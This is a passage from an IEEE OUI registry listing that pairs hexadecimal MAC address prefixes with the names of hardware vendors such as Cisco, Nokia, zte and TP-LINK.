Wellcom Technology Co.,Ltd. EC2E4E HITACHI-LG DATA STORAGE INC D46761 XonTel Technology Co. 3481C4 AVM GmbH CCB691 NECMagnusCommunications 40167E ASUSTek COMPUTER INC. 983713 PT.Navicom Indonesia 4411C2 Telegartner Karl Gartner GmbH 8059FD Noviga 0092FA SHENZHEN WISKY TECHNOLOGY CO.,LTD 687CC8 Measurement Systems S. de R.L. 74F85D Berkeley Nucleonics Corp B061C7 Ericsson-LG Enterprise 400107 Arista Corp 30C750 MIC Technology Group 18CC23 Philio Technology Corporation 98349D Krauss Maffei Technologies GmbH 880FB6 Jabil Circuits India Pvt Ltd,-EHTP unit B46698 Zealabs srl A47E39 zte corporation FCC2DE Murata Manufacturing Co., Ltd. D0C7C0 TP-LINK TECHNOLOGIES CO.,LTD. 100F18 Fu Gang Electronic(KunShan)CO.,LTD 987770 Pep Digital Technology (Guangzhou) Co., Ltd 28C825 DellKing Industrial Co., Ltd 80618F Shenzhen sangfei consumer communications co.,ltd 4C7F62 Nokia Corporation 580528 LABRIS NETWORKS 407875 IMBEL - Industria de Material Belico do Brasil 386C9B Ivy Biomedical B42C92 Zhejiang Weirong Electronic Co., Ltd 5CE7BF New Singularity International Technical Development Co.,Ltd D881CE AHN INC. E0D31A EQUES Technology Co., Limited D82A15 Leitner SpA 6C641A Penguin Computing CC89FD Nokia Corporation 447E76 Trek Technology (S) Pte Ltd B0EC8F GMX SAS 28DEF6 bioMerieux Inc. 34466F HiTEM Engineering 68D247 Portalis LC 50B695 Micropoint Biotechnologies,Inc. B4430D Broadlink Pty Ltd 50A054 Actineon BC14EF ITON Technology Limited D87CDD SANIX INCORPORATED 707C18 ADATA Technology Co., Ltd 5056A8 Jolla Ltd A06518 VNPT TECHNOLOGY 7C8D91 Shanghai Hongzhuo Information Technology co.,LTD 748F1B MasterImage 3D 083F76 Intellian Technologies, Inc. C8F68D S.E.TECHNOLOGIES LIMITED 387B47 AKELA, Inc. C064C6 Nokia Corporation 14F28E ShenYang ZhongKe-Allwin Technology Co.LTD A07771 Vialis BV 10DDF4 Maxway Electronics CO.,LTD 080371 KRG CORPORATE 200E95 IEC – TC9 WG43 78EC74 Kyland-USA B48547 Amptown System Company GmbH E40439 TomTom Software Ltd D0B523 Bestcare Cloucal Corp. 24A495 Thales Canada Inc. D0C42F Tamagawa Seiki Co.,Ltd. 549359 SHENZHEN TWOWING TECHNOLOGIES CO.,LTD. 90356E Vodafone Omnitel N.V. 284430 GenesisTechnical Systems (UK) Ltd 701D7F Comtech Technology Co., Ltd. 9C039E Beijing Winchannel Software Technology Co., Ltd 680AD7 Yancheng Kecheng Optoelectronic Technology Co., Ltd BC8893 VILLBAU Ltd. 5C1193 Seal One AG 847616 Addat s.r.o. DC0575 SIEMENS ENERGY AUTOMATION E097F2 Atomax Inc. 70305E Nanjing Zhongke Menglian Information Technology Co.,LTD E8E770 Warp9 Tech Design, Inc. 609620 Private C0F991 GME Standard Communications P/L C098E5 University of Michigan 50E14A Private 708D09 Nokia Corporation 98FB12 Grand Electronics (HK) Ltd 3C1040 daesung network 28FC51 The Electric Controller and Manufacturing Co., LLC 407496 aFUN TECHNOLOGY INC. 705986 OOO TTV 844F03 Ablelink Electronics Ltd 783D5B TELNET Redes Inteligentes S.A. 443C9C Pintsch GmbH 3CD4D6 WirelessWERX, Inc 0C1262 zte corporation 906717 Alphion India Private Limited 6064A1 RADiflow Ltd. 58B961 SOLEM Electronique 78491D The Will-Burt Company F46ABC Adonit Corp. Ltd. 2C5FF3 Pertronic Industries 58639A TPL SYSTEMES 187ED5 shenzhen kaism technology Co. Ltd 841B38 Shenzhen Excelsecu Data Technology Co.,Ltd 9CF8DB shenzhen eyunmei technology co,.ltd 0C473D Hitron Technologies. Inc 8CCDA2 ACTP, Inc. 84262B Nokia 986CF5 zte corporation 447BC4 DualShine Technology(SZ)Co.,Ltd 706173 Calantec GmbH 7C49B9 Plexus Manufacturing Sdn Bhd E0AF4B Pluribus Networks, Inc. 20D21F Wincal Technology Corp. F89550 Proton Products Chengdu Ltd 840F45 Shanghai GMT Digital Technologies Co., Ltd 7C1AFC Dalian Co-Edifice Video Technology Co., Ltd 28C671 Yota Devices OY D86960 Steinsvik 08EF3B MCS Logic Inc. E8EADA Denkovi Assembly Electronics LTD F85BC9 M-Cube Spa 907A0A Gebr. Bode GmbH & Co KG 1C4158 Gemalto M2M GmbH 9C2840 Discovery Technology,LTD.. 1C7B21 Sony Corporation 6CF97C Nanoptix Inc. F8FF5F Shenzhen Communication Technology Co.,Ltd 54A54B NSC Communications Siberia Ltd BC2B6B Beijing Haier IC Design Co.,Ltd 98D331 Shenzhen Bolutek Technology Co.,Ltd. 38EC11 Novatek Microelectronics Corp. 4CCBF5 zte corporation 44700B IFFU A0C6EC ShenZhen ANYK Technology Co.,LTD 78E8B6 zte corporation DCAE04 CELOXICA Ltd 8005DF Montage Technology Group Limited 7CB77B Paradigm Electronics Inc B0CE18 Zhejiang shenghui lighting co.,Ltd 704CED TMRG, Inc. F08EDB VeloCloud Networks F47A4E Woojeon&Handan 04848A 7INOVA TECHNOLOGY LIMITED C0A39E EarthCam, Inc. 102279 ZeroDesktop, Inc. EC2257 JiangSu NanJing University Electronic Information Technology Co.,Ltd F037A1 Huike Electronics (SHENZHEN) CO., LTD. 681D64 Sunwave Communications Co., Ltd 109AB9 Tosibox Oy 142D8B Incipio Technologies, Inc 68EE96 Cisco SPVTG CCD29B Shenzhen Bopengfa Elec&Technology CO.,Ltd 78DAB3 GBO Technology 700FEC Poindus Systems Corp. A09BBD Total Aviation Solutions Pty Ltd E8481F Advanced Automotive Antennas D40BB9 Solid Semecs bv. F415FD Shanghai Pateo Electronic Equipment Manufacturing Co., Ltd. 748E08 Bestek Corp. 78D38D HONGKONG YUNLINK TECHNOLOGY LIMITED 1078CE Hanvit SI, Inc. D8DA52 APATOR S.A. 587A4D Stonesoft Corporation F02405 OPUS High Technology Corporation 4C21D0 Sony Corporation 84E629 Bluwan SA 3495DB Logitec Corporation 9CB793 Creatcomm Technology Inc. 5C335C Swissphone Telecom AG 70E027 HONGYU COMMUNICATION TECHNOLOGY LIMITED 04DF69 Car Connectivity Consortium D41090 iNFORM Systems AG C47F51 Inventek Systems A897DC IBM 78D5B5 NAVIELEKTRO KY FC4499 Swarco LEA d.o.o. ECD040 GEA Farm Technologies GmbH F80DEA ZyCast Technology Inc. B08807 Strata Worldwide 5CF370 CC&C Technologies, Inc A4E0E6 FILIZOLA S.A. PESAGEM E AUTOMACAO 78F5E5 BEGA Gantenbrink-Leuchten KG C47DFE A.N. Solutions GmbH CCBD35 Steinel GmbH 6CECA1 SHENZHEN CLOU ELECTRONICS CO. LTD. 105C3B Perma-Pipe, Inc. D4016D TP-LINK TECHNOLOGIES CO.,LTD. 985C93 SBG Systems SAS A08A87 HuiZhou KaiYue Electronic Co.,Ltd 28CD9C Shenzhen Dynamax Software Development Co.,Ltd. 349D90 Heinzmann GmbH & CO. KG D862DB Eno Inc. 8C3C07 Skiva Technologies, Inc. DC647C C.R.S. iiMotion GmbH 148692 TP-LINK TECHNOLOGIES CO.,LTD. A8154D TP-LINK TECHNOLOGIES CO.,LTD. F084C9 zte corporation E47D5A Beijing Hanbang Technology Corp. E4F7A1 Datafox GmbH B03850 Nanjing CAS-ZDC IOT SYSTEM CO.,LTD 38A86B Orga BV F07765 Sourcefire, Inc 1441E2 Monaco Enterprises, Inc. 381766 PROMZAKAZ LTD. C0C3B6 Automatic Systems A0EB76 AirCUVE Inc. 249504 SFR F45842 Boxx TV Ltd 106682 NEC Platforms, Ltd. 246278 sysmocom - systems for mobile communications GmbH D81EDE B&W Group Ltd 7038B4 Low Tech Solutions 18E8DD MODULETEK D073D5 LIFI LABS MANAGEMENT PTY LTD 149448 BLU CASTLE S.A. 48F925 Maestronic 68831A Pandora Mobility Corporation 60B185 ATH system 745F00 Samsung Semiconductor Inc. E0C3F3 zte corporation 5C20D0 Asoni Communication Co., Ltd. ACA430 Peerless AV 0C8268 TP-LINK TECHNOLOGIES CO.,LTD. 90DA4E AVANU 281878 Microsoft Corporation 24EA40 Helmholz GmbH & Co. KG FCDB96 ENERVALLEY CO., LTD 1423D7 EUTRONIX CO., LTD. 386793 Asia Optical Co., Inc. ACE97F IoT Tech Limited A0FE91 AVAT Automation GmbH 74ECF1 Acumen 5809E5 Kivic Inc. DC6F08 Bay Storage Technology 504F94 Loxone Electronics GmbH D429EA Zimory GmbH 34ADE4 Shanghai Chint Power Systems Co., Ltd. 541FD5 Advantage Electronics 44184F Fitview BC629F Telenet Systems P. Ltd. 380FE4 Dedicated Network Partners Oy 847A88 HTC Corporation A4D856 Gimbal, Inc 785517 SankyuElectronics B47F5E Foresight Manufacture (S) Pte Ltd 48F230 Ubizcore Co.,LTD 78324F Millennium Group, Inc. 384369 Patrol Products Consortium LLC 34F62D SHARP Corporation 4C8FA5 Jastec 84ED33 BBMC Co.,Ltd E82E24 Out of the Fog Research LLC 80FA5B CLEVO CO. C0B339 Comigo Ltd. 20858C Assa 1C52D6 FLAT DISPLAY TECHNOLOGY CORPORATION D0DFB2 Genie Networks Limited 386645 OOSIC Technology CO.,Ltd B85AF7 Ouya, Inc 84ACA4 Beijing Novel Super Digital TV Technology Co., Ltd ACE87E Bytemark Computer Consulting Ltd 60CDC5 Taiwan Carol Electronics., Ltd D8182B Conti Temic Microelectronic GmbH 80CF41 Lenovo Mobile Communication Technology Ltd. DCB058 Bürkert Werke GmbH 9038DF Changzhou Tiannengbo System Co. Ltd. 185253 Pixord Corporation 683B1E Countwise LTD E85AA7 LLC Emzior 9C9C1D Starkey Labs Inc. 9CE1D6 Junger Audio-Studiotechnik GmbH AC3CB4 Nilan A/S 8007A2 Esson Technology Inc. C0A0E2 Eden Innovations 6C5A34 Shenzhen Haitianxiong Electronic Co., Ltd. 58D6D3 Dairy Cheq Inc 046E49 TaiYear Electronic Technology (Suzhou) Co., Ltd 2C3BFD Netstor Technology Co., Ltd. 080FFA KSP INC. D0D6CC Wintop 58D071 BW Broadcast B49DB4 Axion Technologies Inc. 808287 ATCOM Technology Co.Ltd. 28A186 enblink 6869F2 ComAp s.r.o. B85AFE Handaer Communication Technology (Beijing) Co., Ltd 5887E2 Shenzhen Coship Electronics Co., Ltd. F46DE2 zte corporation 388EE7 Fanhattan LLC ACA22C Baycity Technologies Ltd 303294 W-IE-NE-R Plein & Baus GmbH 7C822D Nortec AC8D14 Smartrove Inc 10FBF0 KangSheng LTD. 04F8C2 Flaircomm Microelectronics, Inc. 503955 Cisco SPVTG AC7236 Lexking Technology Co., Ltd. 3CD7DA SK Mtek microelectronics(shenzhen)limited 2091D9 I'M SPA 141BF0 Intellimedia Systems Ltd 6C9AC9 Valentine Research, Inc. 84DF0C NET2GRID BV 78AB60 ABB Australia 8482F4 Beijing Huasun Unicreate Technology Co., Ltd 5CD41B UCZOON Technology Co., LTD CCE798 My Social Stuff A036F0 Comprehensive Power 180CAC CANON INC. 00DB1E Albedo Telecom SL 60748D Atmaca Elektronik B8B7D7 2GIG Technologies 78D129 Vicos 2CEDEB Alpheus Digital Company Limited 0CD996 Cisco Systems, Inc 98291D Jaguar de Mexico, SA de CV 30F33A +plugg srl 4C72B9 PEGATRON CORPORATION 0CDCCC Inala Technologies 34AF2C Nintendo Co., Ltd. 0C57EB Mueller Systems 745327 COMMSEN CO., LIMITED D08CFF UPWIS AB 68D1FD Shenzhen Trimax Technology Co.,Ltd 9C066E Hytera Communications Corporation Limited 443839 Cumulus Networks, inc CCC104 Applied Technical Systems A4B1E9 Technicolor Delivery Technologies Belgium NV 60455E Liptel s.r.o. D806D1 Honeywell Fire System (Shanghai) Co,. Ltd. 647657 Innovative Security Designs 907025 Garea Microsys Co.,Ltd. 10D1DC INSTAR Deutschland GmbH 34996F VPI Engineering 7CD9FE New Cosmos Electric Co., Ltd. 944A09 BitWise Controls BC28D6 Rowley Associates Limited 10BD18 Cisco Systems, Inc 5869F9 Fusion Transactive Ltd. D41E35 TOHO Electronics INC. 642216 Shandong Taixin Electronic co.,Ltd F8A03D Dinstar Technologies Co., Ltd. 2CD444 FUJITSU LIMITED A4E731 Nokia Corporation 3CEAFB NSE AG 8CC7AA Radinet Communications Inc. 40336C Godrej & Boyce Mfg. co. ltd E856D6 NCTech Ltd C08170 Effigis GeoSolutions BC811F Ingate Systems D867D9 Cisco Systems, Inc 98A7B0 MCST ZAO 4C068A Basler Electric Company 048B42 Skspruce Technologies 5076A6 Ecil Informatica Ind. Com. Ltda A44C11 Cisco Systems, Inc 60843B Soladigm, Inc. 209BA5 JIAXING GLEAD Electronics Co.,Ltd A4F7D0 LAN Accessories Co., Ltd. D4EC0C Harley-Davidson Motor Company 6CA96F TransPacket AS 68D925 ProSys Development Services 848D84 Rajant Corporation D8337F Office FA.com Co.,Ltd. 0036F8 Conti Temic microelectronic GmbH 709E86 X6D Limited A0F419 Nokia Corporation 1C973D PRICOM Design BC0200 Stewart Audio 1C7C45 Vitek Industrial Video Products, Inc. 3C3888 ConnectQuest, llc 48D7FF BLANKOM Antennentechnik GmbH C47130 Fon Technology S.L. A0F450 HTC Corporation 6089B1 Key Digital Systems 44D15E Shanghai Kingto Information Technology Ltd 0036FE SuperVision AC0142 Uriel Technologies SIA 542A9C LSY Defense, LLC. 504A5E Masimo Corporation 60B933 Deutron Electronics Corp. 489153 Weinmann Geräte für Medizin GmbH + Co. KG AC9403 Envision Peripherals Inc 54466B Shenzhen CZTIC Electronic Technology Co., Ltd 44B382 Kuang-chi Institute of Advanced Technology 44348F MXT INDUSTRIAL LTDA C47BA3 NAVIS Inc. F44848 Amscreen Group Ltd 50D274 Steffes Corporation 0043FF KETRON S.R.L. 7CACB2 Bosch Software Innovations GmbH 18D66A Inmarsat 28E608 Tokheim C8F704 Building Block Video 508A42 Uptmate Technology Co., LTD BCEA2B CityCom GmbH A45630 Cisco Systems, Inc F85063 Verathon F0D14F LINEAR LLC 0CA138 Blinq Wireless Inc. 5C6F4F S.A. SISTEL 901B0E Fujitsu Technology Solutions GmbH 2C36F8 Cisco Systems, Inc 5808FA Fiber Optic & telecommunication INC. 845787 DVR C&C Co., Ltd. AC3D05 Instorescreen Aisa 74FF7D Wren Sound Systems, LLC ACF0B2 Becker Electronics Taiwan Ltd. C85645 Intermas France 383F10 DBL Technology Ltd. 286094 CAPELEC A826D9 HTC Corporation 28940F Cisco Systems, Inc B8DAF7 Advanced Photonics, Inc. 143AEA Dynapower Company LLC B4D8A9 BetterBots 7CC8D7 Damalisk 00D632 GE Energy C43C3C CYBELEC SA B826D4 Furukawa Industrial S.A. Produtos Elétricos B87447 Convergence Technologies 7463DF VTS GmbH BC125E Beijing WisVideo INC. 14E4EC mLogic LLC E05DA6 Detlef Fink Elektronik & Softwareentwicklung 846AED Wireless Tsukamoto.,co.LTD 045A95 Nokia Corporation 04F4BC Xena Networks 6C3A84 Shenzhen Aero-Startech. Co.Ltd 942E17 Schneider Electric Canada Inc 9CB008 Ubiquitous Computing Technology Corporation A8776F Zonoff 80DB31 Power Quotient International Co., Ltd. 1C51B5 Techaya LTD D01AA7 UniPrint 3828EA Fujian Netcom Technology Co., LTD 2CEE26 Petroleum Geo-Services A086EC SAEHAN HITEC Co., Ltd E03C5B SHENZHEN JIAXINJIE ELECTRON CO.,LTD A4EF52 Telewave Co., Ltd. ACD364 ABB SPA, ABB SACE DIV. 0C9E91 Sankosha Corporation C8F9F9 Cisco Systems, Inc 00FA3B CLOOS ELECTRONIC GMBH CC944A Pfeiffer Vacuum GmbH 0C8525 Cisco Systems, Inc 541DFB Freestyle Energy Ltd 60B606 Phorus 9092B4 Diehl BGT Defence GmbH & Co. KG FC455F JIANGXI SHANSHUI OPTOELECTRONIC TECHNOLOGY CO.,LTD F04A2B PYRAMID Computer GmbH 24BC82 Dali Wireless, Inc. 087572 Obelux Oy 10C2BA UTT Co., Ltd. 90D74F Bookeen 64C5AA South African Broadcasting Corporation CC6DEF TJK Tietolaite Oy A85BF3 Audivo GmbH 20AA4B Cisco-Linksys, LLC 2838CF Gen2wave B8975A BIOSTAR Microtech Int'l Corp. 4833DD ZENNIO AVANCE Y TECNOLOGIA, S.L. 10FC54 Shany Electronic Co., Ltd. C02973 Audyssey Laboratories Inc. 98AAD7 BLUE WAVE NETWORKING CO LTD 9C53CD ENGICAM s.r.l. 608645 Avery Weigh-Tronix, LLC FC8FC4 Intelligent Technology Inc. 603553 Buwon Technology E039D7 Plexxi, Inc. 500B32 Foxda Technology Industrial(ShenZhen)Co.,LTD C46044 Everex Electronics Limited 98FE03 Ericsson - North America 24C0B3 RSF 4C32D9 M Rutty Holdings Pty. Ltd. 68CD0F U Tek Company Limited A4E391 DENY FONTAINE 603FC5 COX CO., LTD A00CA1 SKTB SKiT DC1EA3 Accensus LLC A40130 ABIsystems Co., LTD 90A783 JSW PACIFIC CORPORATION 28AF0A Sirius XM Radio Inc 5CD4AB Zektor 08FC52 OpenXS BV F8462D SYNTEC Incorporation 78A5DD Shenzhen Smarteye Digital Electronics Co., Ltd ECE744 Omntec mfg. inc AC6FD9 Valueplus Inc. 0462D7 ALSTOM HYDRO FRANCE D4507A CEIVA Logic, Inc 182B05 8D Technologies 08A12B ShenZhen EZL Technology Co., Ltd 302DE8 JDA, LLC (JDA Systems) 48A6D2 GJsun Optical Science and Tech Co.,Ltd. 7C336E MEG Electronics Inc. B40C25 Palo Alto Networks F8F7D3 International Communications Corporation 64E84F Serialway Communication Technology Co. Ltd 2C9EFC CANON INC. D4E33F Nokia 28D1AF Nokia Corporation 240BB1 KOSTAL Industrie Elektrik GmbH 20EEC6 Elefirst Science & Tech Co ., ltd E01E07 Anite Telecoms US. Inc 7C6B33 Tenyu Tech Co. Ltd. 147DC5 Murata Manufacturing Co., Ltd. 00B9F6 Shenzhen Super Rich Electronics Co.,Ltd FCC23D Atmel Corporation 88E7A6 iKnowledge Integration Corp. CCE7DF American Magnetics, Inc. A446FA AmTRAN Video Corporation 2804E0 FERMAX ELECTRONICA S.A.U. 10F9EE Nokia Corporation 742B0F Infinidat Ltd. C8F981 Seneca s.r.l. 644346 GuangDong Quick Network Computer CO.,LTD D4024A Delphian Systems LLC 0041B4 Wuxi Zhongxing Optoelectronics Technology Co.,Ltd. F44450 BND Co., Ltd. EC4670 Meinberg Funkuhren GmbH & Co. KG 14307A Avermetrics A06CEC RIM D05A0F I-BT DIGITAL CO.,LTD 64D989 Cisco Systems, Inc 645DD7 Shenzhen Lifesense Medical Electronics Co., Ltd. 90B97D Johnson Outdoors Marine Electronics d/b/a Minnkota F4B164 Lightning Telecommunications Technology Co. Ltd 70B035 Shenzhen Zowee Technology Co., Ltd 8821E3 Nebusens, S.L. EC9681 2276427 Ontario Inc 5C076F Thought Creator 3C0FC1 KBC Networks 58E636 EVRsafe Technologies 24497B Innovative Converged Devices Inc 788973 CMC 203706 Cisco Systems, Inc 98E79A Foxconn(NanJing) Communication Co.,Ltd. A0E9DB Ningbo FreeWings Technologies Co.,Ltd 7CF429 NUUO Inc. 60190C RRAMAC D05FCE Hitachi Data Systems F80332 Khomp 8C82A8 Insigma Technology Co.,Ltd CCB55A Fraunhofer ITWM AC8ACD ROGER D.Wensker, G.Wensker sp.j. 984246 SOL INDUSTRY PTE., LTD 3429EA MCD ELECTRONICS SP. Z O.O. 28A574 Miller Electric Mfg. Co. D09B05 Emtronix AC4723 Genelec E8BA70 Cisco Systems, Inc D4A425 SMAX Technology Co., Ltd. 8C11CB ABUS Security-Center GmbH & Co. KG 1045BE Norphonic AS F81D93 Longdhua(Beijing) Controls Technology Co.,Ltd CCF841 Lumewave 14EB33 BSMediasoft Co., Ltd. F4B549 Xiamen Yeastar Information Technology Co., Ltd. 68876B INQ Mobile Limited 1CAA07 Cisco Systems, Inc 685B36 POWERTECH INDUSTRIAL CO., LTD. 8C4435 Shanghai BroadMobi Communication Technology Co., Ltd. 90B8D0 Joyent, Inc. 281471 Lantis co., LTD. 88B168 Delta Control GmbH AC8674 Open Mesh, Inc. 64D241 Keith & Koep GmbH 18B79E Invoxia 94D93C ENELPS B8BEBF Cisco Systems, Inc 64B64A ViVOtech, Inc. 28EE2C Frontline Test Equipment 782EEF Nokia Corporation 7CF0BA Linkwell Telesystems Pvt Ltd FC8329 Trei technics 38D135 EasyIO Corporation Sdn. Bhd. 30EB25 INTEK DIGITAL 44E4D9 Cisco Systems, Inc ACCA54 Telldus Technologies AB 901900 SCS SA D45D42 Nokia Corporation B03829 Siliconware Precision Industries Co., Ltd. 7C6C39 PIXSYS SRL BC2846 NextBIT Computing Pvt. Ltd. BC0F2B FORTUNE TECHGROUP CO.,LTD 648125 Alphatron Marine BV 8CF9C9 MESADA Technology Co.,Ltd. 042605 Bosch Building Automation GmbH CCF67A Ayecka Communication Systems LTD D8C99D EA DISPLAY LIMITED 1083D2 Microseven Systems, LLC 34684A Teraworks Co., Ltd. CCFC6D RIZ TRANSMITTERS E03E7D data-complex GmbH D8DF0D beroNet GmbH ACF97E ELESYS INC. 204005 feno GmbH 300B9C Delta Mobile Systems, Inc. 24F0FF GHT Co., Ltd. 9CC0D2 Conductix-Wampfler GmbH C0626B Cisco Systems, Inc D46F42 WAXESS USA Inc 04C5A4 Cisco Systems, Inc 6CAD3F Hubbell Building Automation, Inc. 18B3BA Netlogic AB D47B75 HARTING Electronics GmbH 8C5FDF Beijing Railway Signal Factory 94E226 D. ORtiz Consulting, LLC 0CC6AC DAGS 8065E9 BenQ Corporation 286046 Lantech Communications Global, Inc. 10E2D5 Qi Hardware Inc. 60C980 Trymus A036FA Ettus Research LLC EC836C RM Tech Co., Ltd. EC986C Lufft Mess- und Regeltechnik GmbH D093F8 Stonestreet One LLC 9C645E Harman Consumer Group 1C334D ITS Telecom F0933A NxtConect 70DDA1 Tellabs 94D019 Cydle Corp. 8C278A Vocollect Inc EC4644 TTK SAS DCD87F Shenzhen JoinCyber Telecom Equipment Ltd B4E0CD Fusion-io, Inc 4CB9C8 CONET CO., LTD. 78593E RAFI GmbH & Co.KG 509772 Westinghouse Digital 8CB64F Cisco Systems, Inc 20FECD System In Frontier Inc. 503DE5 Cisco Systems, Inc 540496 Gigawave LTD 303955 Shenzhen Jinhengjia Electronic Co., Ltd. FC5B24 Weibel Scientific A/S E41C4B V2 TECHNOLOGY, INC. 5CF3FC IBM Corp 4891F6 Shenzhen Reach software technology CO.,LTD 649B24 V Technology Co., Ltd. 846EB1 Park Assist LLC 6C504D Cisco Systems, Inc B8D06F GUANGZHOU HKUST FOK YING TUNG RESEARCH INSTITUTE EC14F6 BioControl AS CC0CDA Miljovakt AS A86A6F RIM 500E6D TrafficCast International EC3BF0 NovelSat 4CEDDE ASKEY COMPUTER CORP E8E08F GRAVOTECH MARKING SAS B8FF6F Shanghai Typrotech Technology Co.Ltd 68122D Special Instrument Development Co., Ltd. 94F720 Tianjin Deviser Electronics Instrument Co., Ltd DC9C52 Sapphire Technology Limited. ACAB8D Lyngso Marine A/S 6083B2 GkWare e.K. 80D019 Embed, Inc 68EBC5 Angstrem Telecom E8995A PiiGAB, Processinformation i Goteborg AB 401D59 Biometric Associates, LP A89B10 inMotion Ltd. B41489 Cisco Systems, Inc A0B5DA HongKong THTF Co., Ltd 8886A0 Simton Technologies, Ltd. A45055 BUSWARE.DE 204AAA Hanscan Spain S.A. 1CBD0E Amplified Engineering Pty Ltd A0F217 GE Medical System(China) Co., Ltd. F0A764 GST Co., Ltd. 1C0656 IDY Corporation 582F42 Universal Electric Corporation 0474A1 Aligera Equipamentos Digitais Ltda 5C6984 NUVICO B8415F ASP AG 2CB69D RED Digital Cinema C88B47 Nolangroup S.P.A con Socio Unico C4CD45 Beijing Boomsense Technology CO.,LTD. 54FDBF Scheidt & Bachmann GmbH D0BB80 SHL Telemedicine International Ltd. A4A80F Shenzhen Coship Electronics Co., Ltd. 5C17D3 LGE 1CDF0F Cisco Systems, Inc 68BDAB Cisco Systems, Inc 9CADEF Obihai Technology, Inc. D08999 APCON, Inc. C88447 Beautiful Enterprise Co., Ltd C02BFC iNES. applied informatics GmbH 94C7AF Raylios Technology D81C14 Compacta International, Ltd. 008C10 Black Box Corp. B0B8D5 Nanjing Nengrui Auto Equipment CO.,Ltd F8B599 Guangzhou CHNAVS Digital Technology Co.,Ltd B8921D BG T&A 80C6CA Endian s.r.l. E061B2 HANGZHOU ZENOINTEL TECHNOLOGY CO., LTD 9411DA ITF Fröschl GmbH 8039E5 PATLITE CORPORATION 14FEAF SAGITTAR LIMITED DC7B94 Cisco Systems, Inc 5CCA32 Theben AG 94E711 Xirka Dama Persada PT 90903C TRISON TECHNOLOGY CORPORATION 8CE7B3 Sonardyne International Ltd 088DC8 Ryowa Electronics Co.,Ltd 7076F0 LevelOne Communications (India) Private Limited B081D8 I-sys Corp 6C9B02 Nokia Corporation 641E81 Dowslake Microsystems EC542E Shanghai XiMei Electronic Technology Co. Ltd F0E5C3 Drägerwerk AG & Co. KG aA 988EDD TE Connectivity Limerick 98FC11 Cisco-Linksys, LLC 34E0D7 DONGGUAN QISHENG ELECTRONICS INDUSTRIAL CO., LTD D84606 Silicon Valley Global Marketing D0D0FD Cisco Systems, Inc F41F0B YAMABISHI Corporation A082C7 P.T.I Co.,LTD 7415E2 Tri-Sen Systems Corporation ECC38A Accuenergy (CANADA) Inc D48FAA Sogecam Industrial, S.A. E05B70 Innovid, Co., Ltd. 043604 Gyeyoung I&T A4B2A7 Adaxys Solutions AG E87AF3 S5 Tech S.r.l. FCD4F6 Messana Air.Ray Conditioning s.r.l. D466A8 Riedo Networks Ltd 141BBD Volex Inc. D82986 Best Wish Technology LTD 446132 ecobee inc 78A714 Amphenol F450EB Telechips Inc 48FCB8 Woodstream Corporation F893F3 VOLANS 7866AE ZTEC Instruments, Inc. 4C022E CMR KOREA CO., LTD CC5C75 Weightech Com. Imp. Exp. Equip. Pesagem Ltda 90E0F0 IEEE 1722a Working Group F8AC6D Deltenna Ltd A4561B MCOT Corporation 80C63F Remec Broadband Wireless , LLC 40D40E Biodata Ltd 0C826A Wuhan Huagong Genuine Optics Technology Co., Ltd D4000D Phoenix Broadband Technologies, LLC. AC5135 MPI TECH 44D63D Talari Networks 78A2A0 Nintendo Co., Ltd. 34AAEE Mikrovisatos Servisas UAB 74B9EB JinQianMao Technology Co.,Ltd. D45297 nSTREAMS Technologies, Inc. 18B209 Torrey Pines Logic, Inc D84B2A Cognitas Technologies, Inc. 684B88 Galtronics Telemetry Inc. A4AE9A Maestro Wireless Solutions ltd. 40520D Pico Technology 807D1B Neosystem Co. Ltd. C848F5 MEDISON Xray Co., Ltd 1880CE Barberry Solutions Ltd 24B6B8 FRIEM SPA E4AB46 UAB Selteka 945B7E TRILOBIT LTDA. 04E548 Cohda Wireless Pty Ltd 2893FE Cisco Systems, Inc F4C795 WEY Technology AG 781185 NBS Payment Solutions Inc. 08F6F8 GET Engineering E0271A TTC Next-generation Home Network System WG 0097FF Heimann Sensor GmbH C8EF2E Beijing Gefei Tech. Co., Ltd D05875 Active Control Technology Inc. D81BFE TWINLINX CORPORATION 88BA7F Qfiednet Co., Ltd. 64DB18 OpenPattern 90A2DA GHEO SA 9889ED Anadem Information Inc. 042F56 ATOCS (Shenzhen) LTD E85E53 Infratec Datentechnik GmbH 7071BC PEGATRON CORPORATION 7884EE INDRA ESPACIO S.A. 7C051E RAFAEL LTD. 10090C JANOME Corporation E01CEE Bravo Tech, Inc. FC4463 Universal Audio, Inc 102D96 Looxcie Inc. 1062C9 Adatis GmbH & Co. KG D8AE90 Itibia Technologies B8653B Bolymin, Inc. 38E8DF b gmbh medien + datenbanken 1C129D IEEE PES PSRC/SUB E0CA4D Shenzhen Unistar Communication Co.,LTD A06986 Wellav Technologies Ltd EC8EAD DLX 34C69A Enecsys Ltd F0B6EB Poslab Technology Co., Ltd. 1C8F8A Phase Motion Control SpA FCCCE4 Ascon Ltd. BCD5B6 d2d technologies 5C35DA There Corporation Oy 3C4C69 Infinity System S.L. 7830E1 UltraClenz, LLC B09134 Taleo A4C2AB Hangzhou LEAD-IT Information & Technology Co.,Ltd 48AA5D Store Electronic Systems 0CC9C6 Samwin Hong Kong Limited 60B3C4 Elber Srl 04C880 Samtec Inc CC69B0 Global Traffic Technologies, LLC 0CD502 Westell Technologies Inc. 5850E6 Best Buy Corporation FC683E Directed Perception, Inc 28E794 Microtime Computer Inc. 94592D EKE Building Technology Systems Ltd 80C862 Openpeak, Inc F88DEF Tenebraex 042234 Wireless Standard Extensions ECE9F8 Guang Zhou TRI-SUN Electronics Technology Co., Ltd 34CE94 Parsec (Pty) Ltd 24D2CC SmartDrive Systems Inc. 0CEF7C AnaCom Inc 3C1CBE JADAK LLC 7C08D9 Shanghai B-Star Technology Co 2059A0 Paragon Technologies Inc. A438FC Plastic Logic 18FC9F Changhe Electronics Co., Ltd. A0593A V.D.S. Video Display Systems srl CCEA1C DCONWORKS Co., Ltd D0D286 Beckman Coulter K.K. 38E98C Reco S.p.A. 34EF8B NTT Communications Corporation 687F74 Cisco-Linksys, LLC A0BFA5 CORESYS B05B1F THERMO FISHER SCIENTIFIC S.P.A. BCB181 SHARP CORPORATION C8873B Net Optics E4FFDD ELECTRON INDIA 68A1B7 Honghao Mingchuan Technology (Beijing) CO.,Ltd. 0CD7C2 Axium Technologies, Inc. C4198B Dominion Voting Systems Corporation C83A35 Tenda Technology Co., Ltd. 6C8CDB Otus Technologies Ltd 40F52E Leica Microsystems (Schweiz) AG 002721 Shenzhen Baoan Fenda Industrial Co., Ltd 2C0623 Win Leader Inc. 0C2755 Valuable Techologies Limited F8472D X2gen Digital Corp. Ltd 849000 Arnold&Richter Cine Technik GmbH & Co. Betriebs KG 08184C A. S. Thomas, Inc. 